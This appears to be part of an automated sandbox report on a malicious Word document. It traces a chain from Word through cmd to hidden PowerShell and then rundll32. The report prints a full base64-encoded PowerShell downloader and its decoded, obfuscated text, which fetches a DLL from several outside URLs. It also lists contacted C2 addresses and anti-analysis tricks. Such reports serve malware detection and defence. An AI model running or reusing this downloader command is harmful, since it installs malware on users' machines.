Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Users\user\Kaktksw\An6othh\N49I.dll Jump to dropped file
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2508 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior
Source: powershell.exe, 00000005.00000002.2097305734.00000000001A4000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

barindex
Contains functionality to read the PEB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00241D4D mov eax, dword ptr fs:[00000030h] 7_2_00241D4D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_005112C1 mov eax, dword ptr fs:[00000030h] 7_2_005112C1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00231D4D mov eax, dword ptr fs:[00000030h] 8_2_00231D4D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002D12C1 mov eax, dword ptr fs:[00000030h] 8_2_002D12C1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001E12C1 mov eax, dword ptr fs:[00000030h] 9_2_001E12C1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001C12C1 mov eax, dword ptr fs:[00000030h] 10_2_001C12C1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002212C1 mov eax, dword ptr fs:[00000030h] 11_2_002212C1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001812C1 mov eax, dword ptr fs:[00000030h] 12_2_001812C1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00711D4D mov eax, dword ptr fs:[00000030h] 13_2_00711D4D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_006A12C1 mov eax, dword ptr fs:[00000030h] 13_2_006A12C1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00741D4D mov eax, dword ptr fs:[00000030h] 14_2_00741D4D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_007E12C1 mov eax, dword ptr fs:[00000030h] 14_2_007E12C1
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory protected: page write copy | page execute | page execute read | page execute and read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 217.160.169.110 144 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 51.255.203.164 144 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 185.183.16.47 80 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 84.232.229.24 80 Jump to behavior
Encrypted powershell cmdline option found
Source: unknown Process created: Base64 decoded SET ("5"+"FTsG") ( [tYPE]("{1}{3}{0}{4}{2}" -F 'Io.','sy','Ory','stem.','dIrect')) ; $qE3R9= [TyPe]("{1}{0}{5}{4}{2}{3}"-f'Y','S','PoiNtmAn','AGEr','tEm.nET.SeRVIce','s') ;$Ko3ac63=$T82H + [char](33) + $P6_S;$I70Z=('Y5'+'0E'); (Get-iTEm ("v"+"a"+"RIABle:5"+"FtSg") ).ValUe::"Cr`EAtE`dire`ctorY"($HOME + ((('e2W'+'K'+'ak')+('tksw'+'e'+'2W')+('An6ot'+'h')+('he'+'2W')) -cREPLACe ('e'+'2W'),[CHAR]92));$W90X=('D'+('63'+'T')); (VarIABle Qe3R9 -vALuEOnl )::"S`EC`UrIt`Y`protoCOL" = ('Tl'+('s1'+'2'));$E32N=('J'+('96'+'C'));$Ue7v6em = (('N'+'49')+'I');$B31C=('A8'+'1J');$Qfx10xa=$HOME+(('{0}Ka'+'ktksw{'+'0'+'}'+'An'+'6othh{0}')-F [chaR]92)+$Ue7v6em+'.d' + 'll';$Y03E=('B3'+'3R');$K1iuxxp='h' + 'tt' + 'p';$Ta1ysp4=('ns'+' '+('wu d'+'b ')+('n'+'d:')+('/'+'/shan')+'n'+('ar'+'e')+'d'+('.com/co'+'n'+'te'+'n')+'t'+('/lh'+'A')+('Le'+'S')+('/!n'+'s')+(' wu '+'db')+(' n'+'d:')+'//'+('jee'+'van')+('lic.com/w'+'p-'+'co'+'n'+'te')+('nt'+'/')+('r'+'8M/!'+'ns')+(' '+'wu '+'db nd')+(':/'+'/d')+'as'+('h'+'ud')+('ance'+'.co')+('m/'+'th')+'in'+('kp'+'h'+'p/d')+'g'+'s'+('7J'+'m9')+'/'+('!n'+'s w')+('u d'+'b')+(' n'+'d:/'+'/')+('l'+'eo')+('par'+'dc')+('ran'+'es')+('.co'+'m/'+'zynq')+'-'+'l'+('i'+'nu'+'x'+'-yaay')+'f/'+('w'+'/!n')+'s '+('wu '+'db'+' ')+'n'+'d'+':'+'/'+('/mmrinc'+'s.')+('co'+'m'+'/eternal-')+('d'+'uel')+('i'+'st-')+('9cu'+'qv/j')+('x'+'GQj/!'+'n')+('s'+' w')+('u d'+'b nd'+':/')+('/3'+'mu'+'sk')+'et'+('eer'+'sent.ne'+'t/')+('w'+'p-in'+'cludes/TU'+'gD/!n'+'s ')+'wu'+' '+('d'+'b ')
Source: C:\Windows\System32\cmd.exe Process created: Base64 decoded SET ("5"+"FTsG") ( [tYPE]("{1}{3}{0}{4}{2}" -F 'Io.','sy','Ory','stem.','dIrect')) ; $qE3R9= [TyPe]("{1}{0}{5}{4}{2}{3}"-f'Y','S','PoiNtmAn','AGEr','tEm.nET.SeRVIce','s') ;$Ko3ac63=$T82H + [char](33) + $P6_S;$I70Z=('Y5'+'0E'); (Get-iTEm ("v"+"a"+"RIABle:5"+"FtSg") ).ValUe::"Cr`EAtE`dire`ctorY"($HOME + ((('e2W'+'K'+'ak')+('tksw'+'e'+'2W')+('An6ot'+'h')+('he'+'2W')) -cREPLACe ('e'+'2W'),[CHAR]92));$W90X=('D'+('63'+'T')); (VarIABle Qe3R9 -vALuEOnl )::"S`EC`UrIt`Y`protoCOL" = ('Tl'+('s1'+'2'));$E32N=('J'+('96'+'C'));$Ue7v6em = (('N'+'49')+'I');$B31C=('A8'+'1J');$Qfx10xa=$HOME+(('{0}Ka'+'ktksw{'+'0'+'}'+'An'+'6othh{0}')-F [chaR]92)+$Ue7v6em+'.d' + 'll';$Y03E=('B3'+'3R');$K1iuxxp='h' + 'tt' + 'p';$Ta1ysp4=('ns'+' '+('wu d'+'b ')+('n'+'d:')+('/'+'/shan')+'n'+('ar'+'e')+'d'+('.com/co'+'n'+'te'+'n')+'t'+('/lh'+'A')+('Le'+'S')+('/!n'+'s')+(' wu '+'db')+(' n'+'d:')+'//'+('jee'+'van')+('lic.com/w'+'p-'+'co'+'n'+'te')+('nt'+'/')+('r'+'8M/!'+'ns')+(' '+'wu '+'db nd')+(':/'+'/d')+'as'+('h'+'ud')+('ance'+'.co')+('m/'+'th')+'in'+('kp'+'h'+'p/d')+'g'+'s'+('7J'+'m9')+'/'+('!n'+'s w')+('u d'+'b')+(' n'+'d:/'+'/')+('l'+'eo')+('par'+'dc')+('ran'+'es')+('.co'+'m/'+'zynq')+'-'+'l'+('i'+'nu'+'x'+'-yaay')+'f/'+('w'+'/!n')+'s '+('wu '+'db'+' ')+'n'+'d'+':'+'/'+('/mmrinc'+'s.')+('co'+'m'+'/eternal-')+('d'+'uel')+('i'+'st-')+('9cu'+'qv/j')+('x'+'GQj/!'+'n')+('s'+' w')+('u d'+'b nd'+':/')+('/3'+'mu'+'sk')+'et'+('eer'+'sent.ne'+'t/')+('w'+'p-in'+'cludes/TU'+'gD/!n'+'s ')+'wu'+' '+('d'+'b ') Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file. Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc UwBFAFQAIAAgACgAIgA1ACIAKwAiAEYAVABzAEcAIgApACAAKAAgAFsAdABZAFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADQAfQB7ADIAfQAiACAALQBGACAAJwBJAG8ALgAnACwAJwBzAHkAJwAsACcATwByAHkAJwAsACcAcwB0AGUAbQAuACcALAAnAGQASQByAGUAYwB0ACcAKQApACAAOwAgACAAJABxAEUAMwBSADkAPQAgACAAWwBUAHkAUABlAF0AKAAiAHsAMQB9AHsAMAB9AHsANQB9AHsANAB9AHsAMgB9AHsAMwB9ACIALQBmACcAWQAnACwAJwBTACcALAAnAFAAbwBpAE4AdABtAEEAbgAnACwAJwBBAEcARQByACcALAAnAHQARQBtAC4AbgBFAFQALgBTAGUAUgBWAEkAYwBlACcALAAnAHMAJwApACAAIAA7ACQASwBvADMAYQBjADYAMwA9ACQAVAA4ADIASAAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAUAA2AF8AUwA7ACQASQA3ADAAWgA9ACgAJwBZADUAJwArACcAMABFACcAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAEUAbQAgACAAKAAiAHYAIgArACIAYQAiACsAIgBSAEkAQQBCAGwAZQA6ADUAIgArACIARgB0AFMAZwAiACkAIAAgACkALgBWAGEAbABVAGUAOgA6ACIAQwByAGAARQBBAHQARQBgAGQAaQByAGUAYABjAHQAbwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAMgBXACcAKwAnAEsAJwArACcAYQBrACcAKQArACgAJwB0AGsAcwB3ACcAKwAnAGUAJwArACcAMgBXACcAKQArACgAJwBBAG4ANgBvAHQAJwArACcAaAAnACkAKwAoACcAaABlACcAKwAnADIAVwAnACkAKQAgACAALQBjAFIARQBQAEwAQQBDAGUAIAAoACcAZQAnACsAJwAyAFcAJwApACwAWwBDAEgAQQBSAF0AOQAyACkAKQA7ACQAVwA5ADAAWAA9ACgAJwBEACcAKwAoACcANgAzACcAKwAnAFQAJwApACkAOwAgACgAVgBhAHIASQBBAEIAbABlACAAUQBlADMAUgA5ACAALQB2AEEATAB1AEUATwBuAGwAIAAgACkAOgA6ACIAUwBgAEUAQwBgAFUAcgBJAHQAYABZAGAAcAByAG8AdABvAEMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAMgBOAD0AKAAnAEoAJwArACgAJwA5ADYAJwArACcAQwAnACkAKQA7ACQAVQBlADcAdgA2AGUAbQAgAD0AIAAoACgAJwBOACcAKwAnADQAOQAnACkAKwAnAEkAJwApADsAJABCADMAMQBDAD0AKAAnAEEAOAAnACsAJwAxAEoAJwApADsAJABRAGYAeAAxADAAeABhAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ASwBhACcAKwAnAGsAdABrAHMAdwB7ACcAKwAnADAAJwArACcAfQAnACsAJwBBAG4AJwArACcANgBvAHQAaABoAHsAMAB9ACcAKQAtAEYAIABbAGMAaABhAFIAXQA5ADIAKQArACQAVQBlADcAdgA2AGUAbQArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQAWQAwADMARQA9ACgAJwBCADMAJwArACcAMwBSACcAKQA7ACQASwAxAGkAdQB4AHgAcAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAFQAYQAxAHkAcwBwADQAPQAoACcAbgBzACcAKwAnACAAJwArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAoACcAbgAnACsAJwBkADoAJwApACsAKAAnAC8AJwArACcALwBzAGgAYQBuACcAKQArACcAbgAnACsAKAAnAGEAcgAnACsAJwBlACcAKQArACcAZAAnACsAKAAnAC4AYwBvAG0ALwBjAG8AJwArACcAbgAnACsAJwB0AGUAJwArACcAbgAnACkAKwAnAHQAJwArACgAJwAvAGwAaAAnACsAJwBBACcAKQArACgAJwBMAGUAJwArACcAUwAnACkAKwAoACcALwAhAG4AJwArACcAcwAnACkAKwAoACcAIAB3AHUAIAAnACsAJwBkAGIAJwApACsAKAAnACAAbgAnACsAJwBkADoAJwApACsAJwAvAC8AJwArACgAJwBqAGUAZQAnACsAJwB2AGEAbgAnACkAKwAoACcAbABpAGMALgBjAG8AbQAvAHcAJwArACcAcAAtACcAKwAnAGMAbwAnACsAJwBuACcAKwAnAHQAZQAnACkAKwAoACcAbgB0ACcAKwAnAC8AJwApACsAKAAnAHIAJwArACcAOABNAC8AIQAnACsAJwBuAHMAJwApACsAKAAnACAAJwArACcAdwB1ACAAJwArACcAZABiACAAbgBkACcAKQArACgAJwA6AC8AJwArACcALwBkACcAKQArACcAYQBzACcAKwAoACcAaAAnACsAJwB1AGQAJwApACsAKAAnAGEAbgBjAGUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB0AGgAJwApACsAJwBpAG4AJwArACgAJwBrAHAAJwArACcAaAAnACsAJwBwAC8AZAAnACkAKwAnAGcAJwArACcAcwAnACsAKAAnADcASgAnACsAJwBtADkAJwApACsAJwAvACcAKwAoACcAIQBuACcAKwAnAHMAIAB3AC Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Kaktksw\An6othh\N49I.dll',#1 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xsugi\zrfn.shd',FIxqgRZUp Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xsugi\zrfn.shd',#1 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Omuzql\aridm.cve',PiBVmMpskdW Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Omuzql\aridm.cve',#1 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yjyrclfl\qwodoyj.whn',CPVO Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yjyrclfl\qwodoyj.whn',#1 Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
